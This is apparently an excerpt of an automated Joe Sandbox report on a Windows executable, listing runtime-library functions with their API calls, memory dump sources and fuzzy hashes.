                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2112829910-0
                                                                                                                                                                                                                            • Opcode ID: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction ID: 80c44f9e7b3c098a654754e3b3f3022cad9a2736861c239906b449d63f08c166
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f82a87537b8027e7676200c750c1b61b831474968f170b13568869e79486f1ab
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0D159B9E00258AFCF15CFA8D880AEEBBB5FF19304F58412AE856E7351D730A945CB51
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 2b25e849923064d9b5a55e65d4fb1bd14e0dfe3207bfc449d4cf15b6a91fd711
                                                                                                                                                                                                                            • Instruction ID: 0a9893d22eeed9fee8359b0510356b52047857ecb3609debaba39f1522766720
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b25e849923064d9b5a55e65d4fb1bd14e0dfe3207bfc449d4cf15b6a91fd711
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7BD1C37191012DABDB20EB94DC52BD9B778AF28304F1554E7A908B3151DB70BF85CF61
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                                                                                                            • Opcode ID: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction ID: 44baabdd045da25a0340e7adba98b2fef7e7bf6ed12b15654a89f0bf7ffd086d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3d6d01937345e1946442e54d5403bf07c2f7eef6f407ef932743465528b97e48
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60511572604606AFEF298F54D841BBA7BA4FF14310F28412DE88A87691E731FC80DBD0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 2a3a95c2239512ea1048ea6c83c2bce4995b7bd70dd19da3d1f381d2d0d0e092
                                                                                                                                                                                                                            • Instruction ID: a07074f8875059847867b17132af561eee1ecb0bba84f82a157b7d09d6a73ad2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2a3a95c2239512ea1048ea6c83c2bce4995b7bd70dd19da3d1f381d2d0d0e092
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F151D8B1E4026A9BDB15EF24DC92ADDB37CAF24704F4101E6E618B3152DB70AF868F54
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2102423945-0
                                                                                                                                                                                                                            • Opcode ID: 4606f376861381f818f80eaab977bb148334af8bbf25d557b91848da5220f5e8
                                                                                                                                                                                                                            • Instruction ID: ffb9c960c553f71858f2b7639d68dae5a77f9aaeb44c20d61dd9f4f8584d05e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4606f376861381f818f80eaab977bb148334af8bbf25d557b91848da5220f5e8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D441B172D4021CABDB24EBA0EC47FDDB37CAB18704F644496B614E3191DBB4AB488F55
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 001AD11F
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD126
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 001AD160
                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 001AD167
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1913693674-0
                                                                                                                                                                                                                            • Opcode ID: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction ID: 415a286567e3b855de8e1ef82d3ef39f628f2fa056607303e51bd92e3ec4b9c5
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2ae98e7da4612b0963887303724d478492abf38d71f1a1a90cc68f55677110c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0521D7B9600A05AFDB20AF65EC8196BB7A9FF173747018918F86BD7950DB30EC40CB90
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction ID: 2b10e350dcfd252cc88c4a7467e48b625b34aa125e4615c957ac3890210c1471
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76d021a6275b02dc72a488f8a54d17875122526cb567c047d7589e603110672e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B921AC79608605AFDF24AF65DC81A6AB7A9FF223647108528F876D7240DF30EE0097A0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 001AE072
                                                                                                                                                                                                                              • Part of subcall function 001ACDFB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,001ACB79,?,00000000,-00000008), ref: 001ACEA7
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0AA
                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 001AE0CA
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 158306478-0
                                                                                                                                                                                                                            • Opcode ID: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction ID: c4f3bcc0fefb6dffa883ba478fc9aebd40430063a3a59b4c8a091f543f8b3440
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 198850b3caed8443665e0fc470f49dc6d9fe8da11d562bbf05b473a54870e36f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F211C4B9605126BF662127B66C8DCAF6DACEFA73A87140124F40192101FF749E0046F1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __getptd.LIBCMT ref: 001E8A71
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __getptd_noexit.LIBCMT ref: 001E6A07
                                                                                                                                                                                                                              • Part of subcall function 001E6A04: __amsg_exit.LIBCMT ref: 001E6A14
                                                                                                                                                                                                                            • __amsg_exit.LIBCMT ref: 001E8A91
                                                                                                                                                                                                                            • __lock.LIBCMT ref: 001E8AA1
                                                                                                                                                                                                                            • _free.LIBCMT ref: 001E8AD1
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3170801528-0
                                                                                                                                                                                                                            • Opcode ID: ede986ab11c6e57392b10305871a61c507c4d0a5f4112cf5c4421020098d088a
                                                                                                                                                                                                                            • Instruction ID: 64a0549b9b88fdc6fb32285bfe2a30a5deca771f4ba45a413b5246cb82dd1b81
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ede986ab11c6e57392b10305871a61c507c4d0a5f4112cf5c4421020098d088a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3501C071D01B51ABCB25AF26A40676DB760BF44720F09013BF508A32E1CF34AD42CBD5
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000), ref: 001B397D
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550,74DEF550,?,001AA734,00000000), ref: 001B3989
                                                                                                                                                                                                                              • Part of subcall function 001B394F: CloseHandle.KERNEL32(FFFFFFFE,001B3999,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550,74DEF550), ref: 001B395F
                                                                                                                                                                                                                            • ___initconout.LIBCMT ref: 001B3999
                                                                                                                                                                                                                              • Part of subcall function 001B3911: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B3940,001B2864,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550), ref: 001B3924
                                                                                                                                                                                                                            • WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,001B2877,00000000,00000001,00000000,74DEF550,?,001AA1AD,74DEF550,00000000,00000000,74DEF550), ref: 001B39AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2744216297-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • EncodePointer.KERNEL32(00000000,?), ref: 0019D1CC
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: EncodePointer
                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                            • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00196B3D
                                                                                                                                                                                                                            • RaiseException.KERNEL32(?,?,?,?,?), ref: 00196B62
                                                                                                                                                                                                                              • Part of subcall function 0019AD9B: RaiseException.KERNEL32(E06D7363,00000001,00000003,00191365,?,?,?,?,00191365,?,001C0B30), ref: 0019ADFB
                                                                                                                                                                                                                              • Part of subcall function 0019DD93: IsProcessorFeaturePresent.KERNEL32(00000017,0019F12B,?,?,?,?,00000000,001A08D9,?,?,?), ref: 0019DDAF
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • InitOnceBeginInitialize.KERNEL32(00224E80,00000000,?,00000000), ref: 00191C30
                                                                                                                                                                                                                            • InitOnceComplete.KERNEL32(00224E80,00000000,00000000), ref: 00191C47
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InitOnce$BeginCompleteInitialize
                                                                                                                                                                                                                            • String ID: xN"
                                                                                                                                                                                                                            • API String ID: 51270584-507102101
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00191762
                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0019179A
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 001988DF
                                                                                                                                                                                                                              • Part of subcall function 001988C0: _Yarn.LIBCPMT ref: 00198903
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                                                                            • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05B7
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,001B083C,00000002,00000000,?,?,?,001B083C,?,00000000), ref: 001B05E0
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,001B083C,?,00000000), ref: 001B05F5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000001.00000002.1711945445.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711929926.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711967695.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1711984669.00000000001C2000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712027484.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000001.00000002.1712044851.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                                                            • Opcode ID: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction ID: 82b011fef9ccf9ae3ed465798c016987a69ea2f0eea9d8ad56bbb1631a143b29
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 852f71fa3954b87abe3c0b9fc14055e5c46a5181198f5869401ded7f8faa0bf4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3D21C572A04101EAEB36DF24CD01AD773A6AB6CB60B568564F94AD7900EB32DE81CB50
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 001B07FF
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 001B0848
                                                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 001B0857
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 001B089F
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 001B08BE
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                                                            • Opcode ID: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction ID: ab91f24a37110ecd09f2e4ef0adee7bf4937ad7e66885c6e84785a2273ebd7f1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 43cb7857c5bbbb30606c06a37dd78bd1ccb2d4733561ece971edaeb8e5a5228b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AD516171D00209ABDB22EFA5CC45AEFB7B8BF1C700F144569F551E7191EB70EA408B61
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: GetLastError.KERNEL32(?,00000008,001A69CC), ref: 001A8DB7
                                                                                                                                                                                                                              • Part of subcall function 001A8DB3: SetLastError.KERNEL32(00000000,001C0710,00000024,0019DDA3), ref: 001A8E59
                                                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001AFE50
                                                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001A4F88,?,?,?,00000055,?,-00000050,?,?), ref: 001AFE7B
                                                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 001AFFDE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                                                            • Opcode ID: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction ID: 4a88e39a5522a0a29a3ad830c47c05d5250ecaa0f5e5d5bcc8595d01fa40cd65
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3584d315ad6f64df94caaf67ded1fd81df36e0f36d39fe87e574df88664115
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7471047AA00206AADB25ABB4CC86BA6B3A8EF1B700F11403DF505D7191FB74ED428760
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _strrchr
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3213747228-0
                                                                                                                                                                                                                            • Opcode ID: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction ID: 0fbef775e9e7da18664adbefb1efe1b6255d57f6e238e56e0ded49500cb80c44
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 345b19b73ae581e04342a76ae529d1a1f04ad07f21d6b651d60a02739456ec14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74B14B769082459FDB158F68CC91BFEBBA5EF5A310F1581AAE815AB2C1D3349F01C7A0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0019A091
                                                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0019A15D
                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0019A176
                                                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0019A180
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                                                            • Opcode ID: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction ID: 23234def3331fcac2f13c501a3dd4852386ecc6813e7625ce343172bf7bd0869
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: adfb7e1cd21b692c857b244e3a139cf9034c76f3aabfba32c53cea0ac258a601
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F5310875D01218DBDF21EFA5D9497CDBBB8AF18300F5041AAE40DAB250EB759B84CF85
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID: `*"
                                                                                                                                                                                                                            • API String ID: 0-228433918
                                                                                                                                                                                                                            • Opcode ID: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction ID: 75013d7f6e6bfade49deb9388ac6ee612568bced2f33c097b6d74a02f7780193
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 76358a7298f06c9afca292a05df3ca2594afb3adad8c1c2d81263d23fcc20480
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 65110232204304AFE718EF24D801F6AB394FF58720F04081DF964873D2DBB1EA01C696
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001973CC
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001973D6
                                                                                                                                                                                                                            • int.LIBCPMT ref: 001973ED
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
